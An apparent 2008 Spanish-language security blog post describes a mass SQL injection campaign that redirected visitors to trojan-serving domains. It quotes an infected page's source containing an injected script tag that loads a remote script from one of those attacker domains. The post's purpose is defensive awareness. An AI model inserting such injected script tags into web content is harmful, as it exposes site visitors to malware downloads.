jueves, 24 de abril de 2008

Ataque masivo de Inyección SQL.

Apareció una noticia en Security Magazine (23/04/2008) y VirusBulletin (24/04/2008) de que varios miles de sitios legítimos han sido afectados por un ataque de inyección de código SQL; al parecer sitios como algunos bajo la responsabilidad de Naciones Unidas o el gobierno británico fueron exitosamente infectados.
 
Una vez que se ha efectuado la inyección de código, el sitio legítimo redirige al usuario a sitios maliciosos para que se intente bajar un troyano. Los sitios maliciosos son: nmidahena.com, aspder.com y nihaorr1.com; esto puede cambiar porque de hecho estos sitios ya no están en línea, al menos cuando los revisé (aún así, no está de más bloquearlos en el firewall).
 
Ejercicio sencillo de Comprobación:
Si buscan en Google por "script src http  nmidahena.com" o "script src http  nihaorr1.com", encontrarán miles de sitios que fueron inyectados con código. Posteriormente ingresan al sitio y en su navegador le ponen "Ver Código Fuente" para que observen el código de la página web. Una vez hecho esto, buscan por "nmidahena, aspder o nihaorr1"; háganlo todo esto con cuidado (si es posible desde una máquina virtual como Virtual PC de Microsoft que es gratuita). He llevado a cabo esta búsqueda en Google y no todos los sitios que aparecen enlistados continúan infectados. Vale la pena que chequen los suyos, espero no se lleven una sorpresa. He revisado un par de sitios mexicanos "famosos"  y al parecer no se han visto afectados.
 
Por ejemplo, el sitio "http://www.sssri.com/websiteenglish/default.asp" aún sigue afectado, en el código fuente de su página web se observa (al día de hoy) la referencia al sitio "nmidahena.com":
==

<html>
<head>
<meta http-equiv=Content-Type content=text/html; charset=gb2312>
<title>Shanghai Ship and Shipping Res<script src=http://www.nmidahena.com/1.js></script></title>
<script language=javascript >
 function JumpDef()
 {
  window.location.href="../home.htm";
 }
</script>
<style>
 
==

Pueden leer la noticia en:
 
Algunos buenos consejos para mitigar este ataque:
http://www.f-secure.com/weblog/archives/00001427.html
 
 
 

1 comentario:

Anónimo dijo...

Your blog keeps getting better and better! Your older articles are not as good as newer ones you have a lot more creativity and originality now keep it up!